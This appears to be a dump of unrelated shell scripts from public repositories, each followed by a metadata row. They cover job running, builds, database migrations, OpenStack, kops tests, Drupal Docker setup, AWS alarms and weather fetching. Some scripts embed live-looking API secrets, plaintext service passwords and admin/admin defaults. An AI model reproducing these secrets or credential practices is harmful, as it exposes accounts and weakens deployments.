> $ferr
echo "!$bname" >$fbak
awk '{
if(NF==0) next;
c=substr($1,1,1)
if(c=="#" || c=="!") next;
if(c=="="){ print "========="; enxt; }
if(c=="%"){
i=2; printf substr($1,2,23);
}
else{
i=1; pn=$1; for(t=2;t<=NF;t++) pn=pn"_"$t
printf substr(pn,1,23)
}
for(;i<NF;i++) printf " "$i
print " "$i
}' $fbat |
while read pname pcomm
do
# Save Bak File when break
if [ $runflag -eq 2 ]; then
echo "%$pname $pcomm" >> $fbak
next
fi
# process parallel
if [ "$pname" = "=========" ]; then
echo "$pname" >> $fbak
while [ $run -ne 0 ]; do freeidle; done
# Pause when last Command Error
if [ $errbz -lt $err ]; then
echo "[$endLine;55H[7mError!Press C-Continue Q-Quite[0m[$endLine;67H\c";
if [ "$AutoKey" = "0" ]; then
a=`gWaitKey CQ`
else
a=$AutoKey
fi
echo "[$endLine;55H \c";
if [ "$a" = "Q" ]; then
runflag=2
next
fi
errbz=$err
fi
next
fi
# Waiting for CPU Idle
while [ "$cpuIdle" -le "$cpuFree" ]; do freeidle; done
# Waiting For Free Process
while [ $run -ge $Volley ]; do freeidle; done
# Find a Process
pnum=`idle`
# Record channel
pe[$pnum]=0
pn[$pnum]=`echo $pname | tr '' ' '`
run=`expr $run + 1`
cpuIdle=`expr $cpuIdle - $cpuUse`
# add Process
{
yy=${y[$pnum]}
xx=${x[$pnum]}
echo "[$yy;${xx}H [$yy;${xx}H[7m->${pn[$pnum]}[0m\c"
fpout=$fbat.$pnum
echo "%$pname $pcomm" >$fpout
fdate=$fbat.date
echo "%$pname begin " `date +%X` >> $fdate
echo "-----------------------" >>$fpout
eval "$pcomm" 1>>$fpout 2>&1
res=$?
if [ $res -ne 0 ]; then
echo "<ErrorCode: $res>" >> $fpout
echo "----------------------" >>$fpout
cat $fpout >>$ferr
echo "%$pname $pcomm" >> $fbak
echo "[$yy;${xx}H[7m*[0m${pn[$pnum]}\c"
echo "%$pname fail " `date +%X` >> $fdate
else
echo "[$yy;${xx}H0${pn[$pnum]}\c"
#add by liusc
echo "%$pname success " `date +%X` >> $fdate
fi
rm $fpout
} &
res=$?
if [ $res -ne 0 ]; then
echo "%$pname $pcomm" >>$fbak
echo "*Fork error!* %$pname $pcomm" >>$ferr
fi
# record Process Flag
id[$pnum]=$!
done
# exit process
while [ $run -ne 0 ]; do freeidle; done
if [ $err -eq 0 ]; then rm -f $ferr $fbak; fi
echo "[$endLine;35HEndTime\c"
echo "[$endLine;55H[7mComplete!PressQ to Quite[0m[$endLine;69H\c"
if [ "$AutoKey" = "0" ]; then
gWaitKey Q
stty "$STTYSAVE"
clear
else
echo "Q"
fi
rm -f $ftmp
return $err
| true
|
2a6d7cec1d21aec186fb48055114bca952a5bb12
|
Shell
|
justpayne/jburkardt-f77
|
/toms626/toms626_prb1.sh
|
UTF-8
| 525
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/bash
#
gfortran -c -g toms626_prb1.f >& compiler.txt
if [ $? -ne 0 ]; then
echo "Errors compiling toms626_prb1.f"
exit
fi
rm compiler.txt
#
gfortran toms626_prb1.o -L$HOME/libf77/$ARCH -ltoms626 -lcalcomp
if [ $? -ne 0 ]; then
echo "Errors linking and loading toms626_prb1.o"
exit
fi
rm toms626_prb1.o
#
mv a.out toms626_prb1
./toms626_prb1 > toms626_prb1_output.txt
if [ $? -ne 0 ]; then
echo "Errors running toms626_prb1"
exit
fi
rm toms626_prb1
#
echo "Test results written to toms626_prb1_output.txt."
| true
|
7b4ca3652fe0e58b371e337ce0c2cedcd1fa8a9e
|
Shell
|
NoLegalTech/nosediceasi
|
/db/migrations-functions
|
UTF-8
| 1,513
| 4.21875
| 4
|
[] |
no_license
|
#!/bin/bash
script_dir="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
declare -a migrations
migration=all
function migrate {
migrationType=$1
migrationNumber=$2
number=$(printf "%04d\n" $migrationNumber)
echo "Running migration ${number} [${migrationType}]";
[[ $migrationType == "up" ]] && {
mysql --defaults-extra-file=${script_dir}/config < ${script_dir}/migrations/${number}.sql
}
[[ $migrationType == "down" ]] && {
mysql --defaults-extra-file=${script_dir}/config < ${script_dir}/migrations/${number}.down.sql
}
}
function parse_args {
migration=$1
[[ $migration == "" ]] && {
migration=all
}
}
function get_all_migrations {
list=$(ls $script_dir/migrations/*.sql)
for file in $list
do
filename=$(echo ${file##*/})
number=${filename%.*}
echo ${filename} | grep ".down." > /dev/null || migrations+=(${number})
done
}
function get_all_migrations_reversed {
list=$(ls $script_dir/migrations/*.sql | sort -nr)
for file in $list
do
filename=$(echo ${file##*/})
number=${filename%.*}
echo ${filename} | grep ".down." > /dev/null || migrations+=(${number})
done
}
function run_migrations {
migrationType=$1
[[ "$migration" == "all" ]] && {
for number in "${migrations[@]}"
do
migrate $migrationType $number
done
}
[[ "$migration" == "all" ]] || {
migrate $migrationType $migration
}
}
| true
|
d4dd28fbfcc8cf0435982154ca48a7009947efa5
|
Shell
|
dlux/vagrant-manual-openstack
|
/apt/cinder-controller.sh
|
UTF-8
| 1,616
| 2.796875
| 3
|
[] |
no_license
|
#!/bin/bash
# 0. Post-installation
/root/shared/proxy.sh
source /root/shared/hostnames.sh
echo "source /root/shared/openstackrc" >> /root/.bashrc
# 1. Install OpenStack Block Storage Service and dependencies
apt-get install -y ubuntu-cloud-keyring
echo "deb http://ubuntu-cloud.archive.canonical.com/ubuntu trusty-updates/juno main" >> /etc/apt/sources.list.d/juno.list
apt-get update && apt-get dist-upgrade
apt-get install -y cinder-api cinder-scheduler python-cinderclient
# 2. Configure message broker service
echo "rabbit_host = message-broker" >> /etc/cinder/cinder.conf
echo "rabbit_password = secure" >> /etc/cinder/cinder.conf
echo "auth_strategy = keystone" >> /etc/cinder/cinder.conf
echo "my_ip = ${my_ip}" >> /etc/cinder/cinder.conf
# 3. Configure Identity Service
echo "auth_strategy = keystone" >> /etc/cinder/cinder.conf
echo "" >> /etc/cinder/cinder.conf
echo "[keystone_authtoken]" >> /etc/cinder/cinder.conf
echo "identity_uri = http://identity:35357" >> /etc/cinder/cinder.conf
echo "admin_tenant_name = service" >> /etc/cinder/cinder.conf
echo "admin_user = cinder" >> /etc/cinder/cinder.conf
echo "admin_password = secure" >> /etc/cinder/cinder.conf
# 4. Configure Database driver
echo "" >> /etc/cinder/cinder.conf
echo "[database]" >> /etc/cinder/cinder.conf
echo "connection = mysql://cinder:secure@database/cinder" >> /etc/cinder/cinder.conf
# 5. Generate tables
apt-get install -y python-mysqldb
rm -f /var/lib/cinder/cinder.sqlite
su -s /bin/sh -c "cinder-manage db sync" cinder
# 6. Enable and start services
service cinder-scheduler restart
service cinder-api restart
| true
|
f85edbf9bd4f37dcf5df304e53189ec451650f9a
|
Shell
|
cyrilvj94/ShellScriptExamples
|
/1_Conditionals/Q_1_random_3.sh
|
UTF-8
| 355
| 3.578125
| 4
|
[] |
no_license
|
#! /bin/bash
#Read 5 random 3 digit valuues and then outputs max and min values
for((i=0;i<5;i++))
do
arr_name[$i]=$((100 + (RANDOM%900) ))
done
max=${arr_name[0]}
min=${arr_name[0]}
for i in ${arr_name[@]}
do
echo $i
if [ $i -lt $min ]
then
min=$i
fi
if [ $i -gt $max ]
then
max=$i
fi
done
echo ${arr_name[@]}
echo max $max
echo min $min
| true
|
86c3e365c54f276265b99e4876c4d783891f46cb
|
Shell
|
mushfiq814/dotfiles
|
/scripts/single-file-scripts/btconnect
|
UTF-8
| 346
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/sh
DEVICES=$(bluetoothctl devices)
SELECTION=$(echo "$DEVICES" | awk -F' ' '{print $3}' | rofi -dmenu -i -p "connect to which device?")
if [ -z "$SELECTION" ]
then
exit 0
fi
ID=$(echo "$DEVICES" | grep "$SELECTION" | awk -F' ' '{print $2}')
if [ -z "$ID" ]
then
exit 0
fi
echo "connecting to $SELECTION..."
bluetoothctl connect "$ID"
| true
|
ff32de5d3a032116e10f6b7f6bb50e31a2415f47
|
Shell
|
edgarklerks/dotfiles
|
/scripts/bla.zsh
|
UTF-8
| 489
| 2.890625
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
[ -e ~/.ssh/config.d ] && find ~/.ssh/config.d -print -quit | grep -q . && (
#newestconfig=$(ls -t ~/.ssh/config.d/ | head -1)
newestconfig=$(find ~/.ssh/config.d/* -printf '%T+ %p\n' | sort -r | head -n1 | awk '{print $2}')
if [ "$newestconfig" -nt ~/.ssh/config ]; then
[ -e ~/.ssh/config ] && mv ~/.ssh/config ~/.ssh/config.bak.$(date -Ins)
find ~/.ssh/config.d/* -type f -print0 | sort -z | xargs -0 -n1 cat > ~/.ssh/config
fi
)
| true
|
9763abebf6bc065b89454f93387cec3e3afac68d
|
Shell
|
ahmeddrawy/kops
|
/tests/e2e/scenarios/upgrade/run-test
|
UTF-8
| 3,011
| 2.828125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Copyright 2020 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -o errexit
set -o nounset
set -o pipefail
echo "CLOUD_PROVIDER=${CLOUD_PROVIDER}"
export KOPS_FEATURE_FLAGS="SpecOverrideFlag,${KOPS_FEATURE_FLAGS:-}"
REPO_ROOT=$(git rev-parse --show-toplevel);
PATH=$REPO_ROOT/bazel-bin/cmd/kops/$(go env GOOS)-$(go env GOARCH):$PATH
KUBETEST2_COMMON_ARGS="-v=2 --cloud-provider=${CLOUD_PROVIDER} --cluster-name=${CLUSTER_NAME:-} --kops-binary-path=${REPO_ROOT}/bazel-bin/cmd/kops/linux-amd64/kops"
KUBETEST2_COMMON_ARGS="${KUBETEST2_COMMON_ARGS} --admin-access=${ADMIN_ACCESS:-}"
export GO111MODULE=on
go get sigs.k8s.io/kubetest2@latest
cd ${REPO_ROOT}/tests/e2e
go install ./kubetest2-kops
go install ./kubetest2-tester-kops
kubetest2 kops ${KUBETEST2_COMMON_ARGS} --build --kops-root=${REPO_ROOT} --stage-location=${STAGE_LOCATION:-}
# Always tear-down the cluster when we're done
function finish {
kubetest2 kops ${KUBETEST2_COMMON_ARGS} --down || echo "kubetest2 down failed"
}
trap finish EXIT
kubetest2 kops ${KUBETEST2_COMMON_ARGS} \
--up \
--kubernetes-version=v1.18.15 \
--create-args="--networking calico"
kops set cluster ${CLUSTER_NAME} cluster.spec.kubernetesVersion=v1.19.7
kops update cluster
kops update cluster --admin --yes
kops rolling-update cluster
kops rolling-update cluster --yes --validation-timeout 30m
kops validate cluster
KUBECONFIG=${HOME}/.kube/config
TEST_ARGS="--kubeconfig=${KUBECONFIG}"
if [[ "${CLOUD_PROVIDER}" == "aws" ]]; then
ZONES=`kops get cluster ${CLUSTER_NAME} -ojson | jq -r .spec.subnets[].zone`
CLUSTER_TAG="${CLUSTER_NAME}"
TEST_ARGS="${TEST_ARGS} --provider=aws --cluster-tag=${CLUSTER_TAG}"
# For historical reasons, the flag name for e2e tests on AWS is --gce-zone
TEST_ARGS="${TEST_ARGS} --gce-zone=${ZONES[0]}"
fi
if [[ "${CLOUD_PROVIDER}" == "gce" ]]; then
ZONES=`kops get ig --name ${CLUSTER_NAME} -ojson | jq -r .[0].spec.zones[]`
GCE_PROJECT=`kops get cluster ${CLUSTER_NAME} -ojson |jq -r .spec.project`
TEST_ARGS="${TEST_ARGS} --provider=gce --gce-zone=${ZONES[0]} --gce-project=${GCE_PROJECT}"
fi
kubetest2 kops ${KUBETEST2_COMMON_ARGS} \
--cloud-provider=${CLOUD_PROVIDER} \
--test=kops \
-- \
--test-package-version=v1.18.15 \
--parallel 25 \
--skip-regex="\[Slow\]|\[Serial\]|\[Disruptive\]|\[Flaky\]|\[Feature:.+\]|\[HPA\]|Dashboard|RuntimeClass|RuntimeHandler|TCP.CLOSE_WAIT|Projected.configMap.optional.updates" \
--test-args="${TEST_ARGS}"
| true
|
5ef46b2d0f2f1f871e783e03d2b4567ea9680193
|
Shell
|
yajamon/ios-screen-broadcasting-app
|
/bin/setup.sh
|
UTF-8
| 396
| 3.234375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
readonly DIRPATH=$(cd $(dirname ${BASH_SOURCE:-$0})/; pwd)
readonly REPO_ROOT=$(cd $DIRPATH/..; pwd)
readonly PROJECT_NAME='ScreenBroadcasting'
if ! type -a xcodegen; then
echo "Missing command: xcodegen" >&2
exit 1
fi
if ! test -d $REPO_ROOT/$PROJECT_NAME; then
echo "Missing: $REPO_ROOT/$PROJECT_NAME" >&2
exit 1
fi
cd $REPO_ROOT/$PROJECT_NAME
xcodegen generate
| true
|
13911ef6670e58df7a6fcfe5c6d998fad1d87554
|
Shell
|
moul/docker-drupal
|
/start.sh
|
UTF-8
| 2,067
| 3.4375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
echo "Starting SSHD"
/usr/sbin/sshd -D &
if [ -f /data/ssh-pw.txt ]; then
echo "root:$(cat /data/ssh-pw.txt)" | chpasswd
fi
if [ -d /data/php5 ]; then
rm -rf /etc/php5
ln -s /data/php5 /etc/php5
fi
if [ -f /data/.htaccess ]; then
rm -f /var/www/.htaccess
ln -s /data/.htaccess /var/www/.htaccess
fi
if [ ! -e /root/drush-backups/archive-dump ]; then
mkdir -p /data/backups/drush
ln -s /data/backups/drush /root/drush-backups/archive-dump
fi
if [ ! -d /data/sites/default ]; then
echo "Installing Drupal sites"
cd /data; tar xzf /var/www/sites.tgz
fi
chown -R www-data:www-data /data/sites/
chmod -R a+w /data/sites/
if [ ! -f /data/mysql-root-pw.txt ]; then
echo "Generating mysql root password"
pwgen -c -n -1 12 > /data/mysql-root-pw.txt
fi
if [ ! -f /data/drupal-db-pw.txt ]; then
echo "Generating Drupal DB password"
pwgen -c -n -1 12 > /data/drupal-db-pw.txt
fi
DRUPAL_DB="drupal"
MYSQL_PASSWORD=$(cat /data/mysql-root-pw.txt)
DRUPAL_PASSWORD=$(cat /data/drupal-db-pw.txt)
MYSQL_STARTED=false
if [ ! -d /data/mysql ]; then
echo "Installing Mysql tables"
cd /data && tar xf /var/lib/mysql.tgz
# Start mysql
MYSQL_STARTED=true
/usr/bin/mysqld_safe &
sleep 10s
mysqladmin -u root password $MYSQL_PASSWORD
echo mysql root password: $MYSQL_PASSWORD
echo drupal password: $DRUPAL_PASSWORD
mysql -uroot -p$MYSQL_PASSWORD -e "CREATE DATABASE drupal; GRANT ALL PRIVILEGES ON drupal.* TO 'drupal'@'localhost' IDENTIFIED BY '$DRUPAL_PASSWORD'; FLUSH PRIVILEGES;"
fi
if [ ! -f /data/sites/default/settings.php ]; then
echo "Installing Drupal"
# Start mysql
if [ "$MYSQL_STARTED" == "false" ]; then
MYSQL_STARTED=true
/usr/bin/mysqld_safe &
sleep 10s
fi
cd /var/www/
drush site-install standard -y --account-name=admin --account-pass=admin --db-url="mysqli://drupal:${DRUPAL_PASSWORD}@localhost:3306/drupal"
fi
if [ "$MYSQL_STARTED" == "true" ]; then
killall mysqld sleep 10s
fi
echo "Starting Supervisord"
supervisord -n
| true
|
67508637894463682c519b6b2e9f44550a0e9989
|
Shell
|
lambdaloop/dotfiles
|
/scripts/cool_backgrounds.sh
|
UTF-8
| 284
| 2.5625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
cd /home/pierre/Pictures/wallpapers/chosen/small-desktops
rm -f 0 1 2 3 4 5 6 7 8 9
for i in 0 1 2 3 4 5 6 7 8 9; do
ln -s "$(find ~/Pictures/wallpapers/chosen/small-filled -type f -print | shuf | head -1)" $i
done
notify-send "changed jellyfish backgrounds"
| true
|
4a26b27bddab4eb6cdce0c7cbffd0ba909bd3dea
|
Shell
|
otus-devops-2019-02/pavelpuchok_infra
|
/packer/scripts/install_app.sh
|
UTF-8
| 347
| 2.765625
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set -e
APP_USER=redditapp
APP_DIR=/app
UNIT_SOURCE=/tmp/redditapp.service
UNIT_DEST=/etc/systemd/system/redditapp.service
mv ${UNIT_SOURCE} ${UNIT_DEST}
useradd -U ${APP_USER}
git clone -b monolith https://github.com/express42/reddit.git ${APP_DIR}
cd ${APP_DIR} && bundle install
chown -R ${APP_USER}:${APP_USER} ${APP_DIR}
| true
|
595d51f81cba997437a1f31e9c412fdf6df350a3
|
Shell
|
lamont1008/COSC-350
|
/350/lab2/task6b.sh
|
UTF-8
| 1,650
| 4
| 4
|
[] |
no_license
|
#!/bin/bash
# This program will print a left arrow to the screen
# skip Function
skip() {
for i in $(seq $1);
do
printf " "
done
}
# printStars Function
printStars() {
for i in $(seq $1);
do
printf "*"
done
# Allow the option for printing the tail
if [ ! -z $2 ];
then
for i in $(seq $2);
do
printf "*"
done
fi
}
# Get the length of base from user
echo "What wide length of base would you like?"
read wideBase
# Make sure it meets specifications
if [ `expr "$wideBase" % 2` == 0 ];
then
echo "The wide length must be odd!"
exit 1
fi
# Get the length of the tail from the user
echo "What length of tail would you like?"
read tailSize
# Make sure neither length is less than 0
if [ "$wideBase" -lt 0 ] || [ "$tailSize" -lt 0 ];
then
echo "You cannot have a wide length or tail length less than 0"
exit 1
fi
# Set the number of skips to start with
let "skips=$wideBase-1"
# Set the top half number of rows
let "topHalf=$wideBase/2"
# Set the bottom half the same as the top half
bottomHalf=$topHalf
# Set the number of stars default
numOfStars=1
# Print the top half
for i in $(seq $topHalf);
do
skip $skips
printStars $numOfStars
echo
let "numOfStars+=2"
let "skips-=2"
done
# Print the middle row + the tail
printStars $numOfStars $tailSize
echo
let "numOfStars-=2"
let "skips+=2"
# Print the bottom half of the arrow
for i in $(seq $bottomHalf);
do
skip $skips
printStars $numOfStars
echo
let "numOfStars-=2"
let "skips+=2"
done
echo "Tail $tailSize, Base $wideBase Left Arrow"
exit 0
| true
|
def944cef2586cfa1a1136de3d8a9e79f7bc69ce
|
Shell
|
abhilashmendhe/shell
|
/set-1/seventh
|
UTF-8
| 203
| 2.859375
| 3
|
[] |
no_license
|
#!/bin/bash
a=5000
b=1223
echo "Before swapping a is" $a
echo "Before swapping b is" $b
a=$[$a + $b]
b=$[$a - $b]
a=$[$a - $b]
echo ""
echo "Before swapping a is" $a
echo "Before swapping b is" $b
| true
|
9d0798d3e4c43bbec527caacca5b66068e7e966c
|
Shell
|
karimfadl/kops-asg-notification
|
/SNS-Alarm.sh
|
UTF-8
| 1,279
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash
# Ask the user for his Topic name
echo Hello, What is your Topic Name?
read vartopic
#Create Topic
aws sns create-topic --name $vartopic
topic_arn=$(aws sns list-topics | grep $vartopic | cut -d':' -f2,3,4,5,6,7 | sed 's/"//g')
#Create Email Subscription
# Ask the user for his Mail
echo What is your subscribe Email?
read varmail
aws sns subscribe --topic-arn $topic_arn --protocol email --notification-endpoint $varmail
#Create Alarm For ASG Group Desired Capacity
while true
do
read -r -p "Are You Need To Create Alarm with SNS Action For ASG? [Y/n] " input
case $input in
[yY][eE][sS]|[yY])
echo What is your Autoscaling Group Name?
read var_asg
echo What is Group Desired Capacity Threshold of ASG instances?
read var_threshold
aws cloudwatch put-metric-alarm --alarm-name $var_asg-Alarm --alarm-description "Check Kops ASG Group Desired Capacity" --metric-name GroupDesiredCapacity --namespace AWS/AutoScaling --statistic Average --period 300 --threshold $var_threshold --comparison-operator LessThanThreshold --dimensions Name=AutoScalingGroupName,Value=$var_asg --evaluation-periods 1 --alarm-actions $topic_arn
;;
[nN][oO]|[nN])
echo "Script Finished Check AWS Console"
exit
;;
*)
echo "Invalid input..."
;;
esac
done
| true
|
f26a7fa9d5c7f8acdcf507b6e22a36f5babbd627
|
Shell
|
TiS/docker-php
|
/build.sh
|
UTF-8
| 1,912
| 4.3125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )"
REPOSITORY=tstruczynski/php
VERSIONS=( 7.0 7.1 7.2 7.3 7.4 8.0 8.1)
LATEST=7.4
UPLOAD=0
last_command="";
cleanup() {
rv=$?
if [ "$rv" != "0" ]; then
echo -e "\n\n\"${last_command}\" command failed with exit code $rv.\n\n";
fi
exit $rv
}
declare -A VERSION_MAP
for key in "${!VERSIONS[@]}"; do VERSION_MAP[${VERSIONS[$key]}]="$key"; done # see below
cd "$SCRIPT_DIR"
while getopts v:u flag
do
case "${flag}" in
u) UPLOAD=1;;
v)
if [[ -z "${VERSION_MAP[${OPTARG}]}" ]]; then echo "Version ${OPTARG} is unknown"; exit; fi;
ONLY_VERSION=${OPTARG};;
*) echo -e "\n\tUnknown flag ${flag}\n"; exit 1;;
esac
done
# Exit if any of the commands fails
set -e
# keep track of the last executed command
trap 'last_command=$current_command; current_command=$BASH_COMMAND;' DEBUG
# echo an error message before exiting
trap 'cleanup' EXIT
for version in "${VERSIONS[@]}"
do
if [[ -n "$ONLY_VERSION" && "$version" != "$ONLY_VERSION" ]]; then
echo "SKIPPING VERSION $version"
continue
fi;
cd "$version"
echo "Building version $version START"
# shellcheck disable=SC2002
# shellcheck disable=SC2046
docker build . -t $REPOSITORY:"$version" $(cat .build-args | paste -s -d " " /dev/stdin)
if [ "$version" == "$LATEST" ]; then
docker tag $REPOSITORY:"$version" $REPOSITORY:latest
fi;
echo "Building version $version END"
cd ..
done
if [[ ${UPLOAD} != 1 ]]; then
echo -e "\n--------------\nUpload SKIPPED\n--------------"
exit
fi
echo "Uploading to GITHUB"
if [[ -n ${ONLY_VERSION} ]]; then
echo "Only version ${ONLY_VERSION}"
docker push $REPOSITORY:"${ONLY_VERSION}"
if [ "${ONLY_VERSION}" == "$LATEST" ]; then
docker push $REPOSITORY:latest
fi;
else
echo "All versions"
docker push -a $REPOSITORY
fi
| true
|
c60fedd998f9575adeb817277d0377eb07a86a28
|
Shell
|
e788b1/e1
|
/.i3/agit
|
UTF-8
| 658
| 3.96875
| 4
|
[] |
no_license
|
#!/bin/bash
action=$1
option=$2
args1=$3
args2=$4
args3=$5
[[ -z $GIT_REPOS ]] && GIT_REPOS=${HOME}/.git_repos
case "$action" in
run)
${GIT_REPOS}/${option} $args1 $args2 $args3
;;
clone)
cd ${GIT_REPOS}
git clone $option || {
cd `basename $option`
git pull origin master
}
;;
pullall)
for repo in `ls -d ${GIT_REPOS}/*`; do
[[ ! -d ${repo}/.git ]] && continue
repo_name=`basename ${repo}`
echo -e "\e[32mPulling ${repo_name} ...\e[0m"
cd ${repo}
git pull origin
done
;;
*);;
esac
| true
|
2a5fdb3ccfd44afa32760e56668caf1ec52f63fb
|
Shell
|
powertac/powertac-tools
|
/hamweather/scripts/aeris-weather-hourly
|
UTF-8
| 864
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
# Pulls down hourly observations and 24-hr forecasts for a list
# of locations
locations=('chicago,il' 'minneapolis,mn' 'minot,nd' 'mason%20city,ia' 'tucson,az' 'el%20paso,tx' 'boulder,co' 'cheyenne,wy' 'rotterdam,nl')
output=weather_records.json
echo '-- observation:' `date` >>$output
for loc in ${locations[@]}; do
echo '-- location:' $loc >>$output
wget -O tmp "http://api.aerisapi.com/observations/${loc}?client_id=k2dblnXBvHTqWJy4dKZDr&client_secret=OQMHAbaapWFsRKWp1ybZ2ZyHhycRPIJydt7LurMs&fields=ob.dateTimeISO,ob.tempC,ob.dewpointC,ob.pressureMB,ob.windKPH"
cat tmp >>$output
echo >>$output
wget -O tmp "http://api.aerisapi.com/forecasts/${loc}?filter=1hr&client_id=k2dblnXBvHTqWJy4dKZDr&client_secret=OQMHAbaapWFsRKWp1ybZ2ZyHhycRPIJydt7LurMs&limit=24&fields=periods.dateTimeISO,periods.tempC,periods.dewpointC,periods.sky,periods.windSpeedKPH"
cat tmp >>$output
echo >>$output
done
| true
|
c8949bdb22b1e3cad6c4bb898f3c142091088f59
|
Shell
|
priestlab/cnv-ukb
|
/gwas/run_cnv_burden.sh
|
UTF-8
| 910
| 3.09375
| 3
|
[] |
no_license
|
#!/bin/bash
# define command line arguments for phenotype, name, app_id, bin/qt (needed?)
# usage: script.sh phe_name app_id path/to/file.phe bin/qt
pheID=$1
appID=$2
pheFile=$3
if [ "$4" == "bin" ]; then
kind="firth-fallback"
elif [ "$4" == "qt" ]; then
kind=""
else
echo "unrecognized gwas type $4"
exit 2
fi
# useful
dataRoot="/oak/stanford/groups/jpriest/cnv_ukb"
ml load plink2
# plink command
plink2 --bed "${dataRoot}/resources/burden.bed" \
--bim "${dataRoot}/resources/burden.bim" \
--fam "${dataRoot}/resources/burden.app${appID}.fam" \
--glm hide-covar ${kind} \
--pheno ${pheFile} \
--covar "${dataRoot}/gwas/resources/ukb${appID}_cnv_burden.covar" \
--covar-name age sex PC1-PC4 N_CNV LEN_CNV \
--keep "${dataRoot}/gwas/resources/ukb${appID}_CNV-GWAS.wb-unrel.keep.txt" \
--out "${dataRoot}/burden/output/${pheID}.genic.cnv.burden"
| true
|
acf0db10a35ecbbbbba3f392d326a7f25cfa520f
|
Shell
|
yahaa/Shell
|
/test1.bash
|
UTF-8
| 146
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/bash
a="hello world !"
printf '%s\n' "A is :$a"
num=2
echo "this is the $num"
echo "this is the ${num}nd"
var=0
var=$((var+100))
echo $var
| true
|
34a977ef9fd35a651d592718fbf0ba2d416541d6
|
Shell
|
mask616/common-tools
|
/system-ct-server/polling-daemon/rootfs/www/bin/start_polling-daemon.sh
|
UTF-8
| 724
| 3.1875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
cron_file='/var/spool/cron/root'
cron_log_file='/www/bin/cron_start_polling-daemon.log'
# 每一分钟被拉起1次日志(只看最后一次拉起的时间)
echo $(date) > $cron_log_file
# 检查是否已加入任务
if ! grep -Fxq '*/1 * * * * /bin/sh /www/bin/start_polling-daemon.sh' $cron_file; then
echo '*/1 * * * * /bin/sh /www/bin/start_polling-daemon.sh' >> $cron_file
/usr/sbin/crond reload
echo 'crontab reload' >> $cron_log_file
fi
echo 'maintenance-data crontab start...' >> $cron_log_file
/bin/sh /www/maintenance-data/src/start_md.sh
if [ $? == 0 ]; then
echo 'maintenance-data crontab success' >> $cron_log_file
else
echo 'maintenance-data crontab fail' >> $cron_log_file
fi
| true
|
57380b8e9f23309eeeb43f91512eaeaf6e8b6153
|
Shell
|
rubixlinux/community
|
/laptop-mode-tools/PKGBUILD
|
UTF-8
| 1,840
| 2.96875
| 3
|
[] |
no_license
|
# Maintainer: Joshua Rubin <joshua@rubixlinux.org>
pkgname=laptop-mode-tools
pkgver=1.11
pkgrel=1
pkgdesc="Laptop mode (also known as laptopmode, laptop-mode and laptop_mode, for search engine purposes :) ) is a kernel "mode" that allows you to extend the battery life of your laptop. It does this by intelligently grouping write activity on your disks, so that only reads of uncached data result in a disk spinup. It causes a significant improvement in battery life (for usage patterns that allow it)."
url="http://www.xs4all.nl/~bsamwel/laptop_mode"
backup=('etc/laptop-mode/laptop-mode.conf')
depends=('kernel26' 'acpid')
source=(http://www.xs4all.nl/~bsamwel/laptop_mode/tools/downloads/laptop-mode-tools_${pkgver}.tar.gz \
laptop-mode )
md5sums=('f5c882e2ba1953b80abd1d7cd38c3a51' \
'5ab2cd36f47971f9b8215d6d7e450f5f' )
## Todo:
## None
## Notes:
## None
## Changelog:
## rel1: upgraded to 1.11, updated rc script to new format 2006.01.17
## rel1: initial rubix release
build() {
cd $startdir/src/$pkgname-$pkgver
mkdir -p $startdir/pkg/etc/laptop-mode
cp etc/laptop-mode/laptop-mode.conf $startdir/pkg/etc/laptop-mode
mkdir -p $startdir/pkg/usr/sbin
cp usr/sbin/laptop_mode $startdir/pkg/usr/sbin
cp usr/sbin/lm-syslog-setup $startdir/pkg/usr/sbin
mkdir -p $startdir/pkg/etc/acpi/actions
cp etc/acpi/actions/* $startdir/pkg/etc/acpi/actions
mkdir -p $startdir/pkg/etc/acpi/events
cp etc/acpi/events/* $startdir/pkg/etc/acpi/events
mkdir -p $startdir/pkg/etc/rc.d
cp $startdir/src/laptop-mode $startdir/pkg/etc/rc.d
mkdir -p $startdir/pkg/usr/man/man8
cp man/* $startdir/pkg/usr/man/man8
mkdir -p $startdir/pkg/usr/doc/$pkgname-$pkgver
cp -a \
COPYING \
Documentation/* \
README \
$startdir/pkg/usr/doc/$pkgname-$pkgver
chown -R root.bin $startdir/pkg/usr/sbin
}
| true
|
6a999e51d0796987d65d542cdb2a573b138dadd6
|
Shell
|
spesmilo/electrum
|
/contrib/trigger_deploy.sh
|
UTF-8
| 915
| 3.71875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Triggers deploy.sh to maybe update the website or move binaries.
# uploadserver needs to be defined in /etc/hosts
SSHUSER=$1
TRIGGERVERSION=$2
if [ -z "$SSHUSER" ] || [ -z "$TRIGGERVERSION" ]; then
echo "usage: $0 SSHUSER TRIGGERVERSION"
echo "e.g. $0 thomasv 3.0.0"
echo "e.g. $0 thomasv website"
exit 1
fi
set -ex
cd "$(dirname "$0")"
if [ "$TRIGGERVERSION" == "website" ]; then
rm -f trigger_website
touch trigger_website
echo "uploading file: trigger_website..."
sftp -oBatchMode=no -b - "$SSHUSER@uploadserver" << !
cd electrum-downloads-airlock
mput trigger_website
bye
!
else
rm -f trigger_binaries
printf "$TRIGGERVERSION" > trigger_binaries
echo "uploading file: trigger_binaries..."
